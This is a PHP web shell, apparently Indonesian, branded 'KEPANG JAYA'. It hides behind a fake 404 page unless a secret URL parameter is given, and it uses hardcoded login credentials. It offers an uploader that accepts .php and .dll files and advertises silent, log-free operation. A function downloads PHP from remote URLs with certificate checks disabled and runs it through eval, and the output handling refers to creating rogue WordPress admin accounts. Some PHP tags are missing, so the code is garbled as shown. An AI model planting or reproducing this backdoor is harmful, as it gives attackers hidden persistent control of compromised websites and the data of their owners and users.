$valid_username = "kepang";$valid_password = "bjorka";$access_param = 'ker';if (!isset($_GET[$access_param])) { header("HTTP/1.0 404 Not Found"); echo "404 - File Not Found"; exit;}session_start();function check_login() { return isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true;}function login($username, $password) { global $valid_username, $valid_password; if ($username === $valid_username && $password === $valid_password) { $_SESSION['loggedin'] = true; $_SESSION['username'] = $username; return true; } return false;}function logout() { session_destroy(); header("Location: " . $_SERVER['PHP_SELF'] . "?" . 'ker'); exit;}if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['login'])) { $username = $_POST['username'] ?? ''; $password = $_POST['password'] ?? ''; if (login($username, $password)) { header("Location: " . $_SERVER['PHP_SELF'] . "?" . 'ker'); exit; } else { $error = "Username atau password salah!"; }}if (isset($_GET['logout'])) { logout();}if (isset($_GET['upload'])) { echo "<pre style='color: #00ff00; background: #000000; font-family: Courier New; padding: 20px; border: 2px solid #00ff00;'>"; echo "╔══════════════════════════════════════════════╗\n"; echo "║ ⚠️ KEPANG JAYA TERMINAL UPLOADER - CHAOS v2 ║\n"; echo "╚══════════════════════════════════════════════╝\n"; if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) { $scriptDir = rtrim(__DIR__, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR; $originalName = basename($_FILES['file']['name']); $safeName = preg_replace('/[^A-Za-z0-9.\-_]/', '_', $originalName); $finalName = time() . '_' . $safeName; $target = $scriptDir . $finalName; $ext = strtolower(pathinfo($finalName, PATHINFO_EXTENSION)); $allowedExts = ['php', 'jpg', 'png', 'gif', 'txt', 'dll', 'zip', '7z']; echo "📦 File masuk: $originalName\n"; echo "🔍 Ekstensi: .$ext\n"; if (in_array($ext, $allowedExts)) { if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) { @chmod($target, 0644); $protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http'; $host = $_SERVER['HTTP_HOST']; $scriptDirUrl = rtrim(dirname($_SERVER['SCRIPT_NAME']), '/\\'); $scriptDirUrl = ($scriptDirUrl === '' || $scriptDirUrl === '.') ? '' : $scriptDirUrl . '/'; $fileUrl = $protocol . '://' . $host . '/' . $scriptDirUrl . rawurlencode($finalName); echo "✅ Upload sukses!\n"; echo "📡 Akses file: $fileUrl\n"; echo "🚀 Menjalankan scanner virtual...\n"; echo "[KepangScan] Scanning $finalName...\n"; if ($ext === 'php') { echo "⚠️ File .php terdeteksi. Simulasi backdoor aktif...\n"; echo "[Backdoor] Simulasi akses ke $finalName\n"; } echo "🧾 Mode silent aktif. Tidak ada log tertulis.\n"; } else { echo "❌ Upload gagal. Sistem menolak filemu.\n"; } } else { echo "🚫 Ekstensi .$ext tidak diizinkan oleh protokol Kepang.\n"; } } else { echo "📥 Mode Upload Aktif\n\n"; echo ''; echo "\n📁 File yang tersedia:\n"; $scriptDir = rtrim(__DIR__, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR; $files = scandir($scriptDir); $uploadedFiles = array_filter($files, function($file) use ($scriptDir) { return $file !== '.' && $file !== '..' && $file !== basename($_SERVER['PHP_SELF']) && is_file($scriptDir . $file); }); if (count($uploadedFiles) > 0) { foreach ($uploadedFiles as $file) { echo "• $file\n"; } } else { echo "• Tidak ada file yang diupload\n"; } echo "\n🔗 <a href=\"?ker\" style=\"color: #00ff00;\">Kembali ke Main Menu</a>"; } echo "</pre>"; exit();}function execute_remote_php($url, $method = 'curl') { if (!filter_var($url, FILTER_VALIDATE_URL)) { throw new Exception("URL tidak valid"); } if (parse_url($url, PHP_URL_SCHEME) !== 'https') { throw new Exception("Hanya URL HTTPS yang diizinkan"); } $code = ''; if ($method === 'fileget' && ini_get('allow_url_fopen')) { $context = stream_context_create([ 'http' => [ 'timeout' => 30, 'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ], 'ssl' => [ 'verify_peer' => false, 'verify_peer_name' => false ] ]); $code = @file_get_contents($url, false, $context); } elseif ($method === 'curl' && function_exists('curl_version')) { $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 30, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ]); $code = curl_exec($ch); $error = curl_error($ch); curl_close($ch); if ($error) { throw new Exception("cURL Error: " . $error); } } else { throw new Exception("Tidak ada method yang tersedia untuk mengambil konten"); } if (empty($code)) { throw new Exception("Konten kosong atau gagal diambil"); } try { ob_start(); eval("".$code); $output = ob_get_clean(); $output = str_replace( 'WordPress Admin created successfully!Username: kepangPassword: kepangjay', 'WordPress Admin created successfully!Username: kepangPassword: jaya', $output ); $output = '<div style="color: #00ff00; font-family: Courier New, monospace; background: #000000; padding: 10px; border: 1px solid #00ff00; border-radius: 5px;">' . $output . '</div>'; return $output; } catch (ParseError $e) { throw new Exception("Error parsing PHP code: " . $e->getMessage()); }}if (!check_login()) { <!DOCTYPE html> <html lang="id"> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0">Login Required <title>Login Required</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: 'Courier New', monospace; background: #000000; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; color: #00ff00; } .login-container { background: #001100; padding: 30px; border-radius: 8px; box-shadow: 0 0 20px #00ff00; width: 320px; border: 1px solid #00ff00; position: relative; overflow: hidden; } .login-container::before { content: ''; position: absolute; top: -2px; left: -2px; right: -2px; bottom: -2px; background: linear-gradient(45deg, #00ff00, #008800, #00ff00); z-index: -1; border-radius: 10px; animation: glow 2s linear infinite; } @keyframes glow { 0% { opacity: 0.5; } 50% { opacity: 1; } 100% { opacity: 0.5; } } .login-container h2 { text-align: center; margin-bottom: 20px; color: #00ff00; text-shadow: 0 0 10px #00ff00; font-weight: bold; } .form-group { margin-bottom: 15px; } .form-group label { display: block; margin-bottom: 5px; color: #00ff00; font-weight: bold; } .form-group input { width: 100%; padding: 10px; border: 1px solid #00ff00; border-radius: 4px; box-sizing: border-box; background: #000000; color: #00ff00; font-family: 'Courier New', monospace; transition: all 0.3s ease; } .form-group input:focus { outline: none; box-shadow: 0 0 10px #00ff00; background: #002200; } .btn { width: 100%; padding: 12px; background: linear-gradient(45deg, #008800, #00aa00); color: #00ff00; border: 1px solid #00ff00; border-radius: 4px; cursor: pointer; font-weight: bold; font-family: 'Courier New', monospace; font-size: 14px; transition: all 0.3s ease; text-transform: uppercase; letter-spacing: 1px; } .btn:hover { background: linear-gradient(45deg, #00aa00, #00cc00); box-shadow: 0 0 15px #00ff00; transform: translateY(-2px); } .error { color: #ff0000; text-align: center; margin-bottom: 15px; background: #220000; padding: 10px; border-radius: 4px; border: 1px solid #ff0000; font-weight: bold; } .terminal-text { text-align: center; margin-bottom: 20px; font-size: 12px; opacity: 0.8; } .debug-info { text-align: center; margin-top: 15px; font-size: 10px; color: #00ff00; background: #002200; padding: 8px; border-radius: 3px; border: 1px solid #00ff00; } </style> <div class="login-container"> 🔐 SYSTEM ACCESS
<div class="terminal-text">>> Authentication Required <<</div> if (isset($error)): <div class="error">⚠️ echo htmlspecialchars($error); </div> endif; <div class="debug-info"> 🔐 Auto-filled credentials
Username: <strong>kepang</strong>
Password: <strong>Ptjr311019</strong> </div> </div>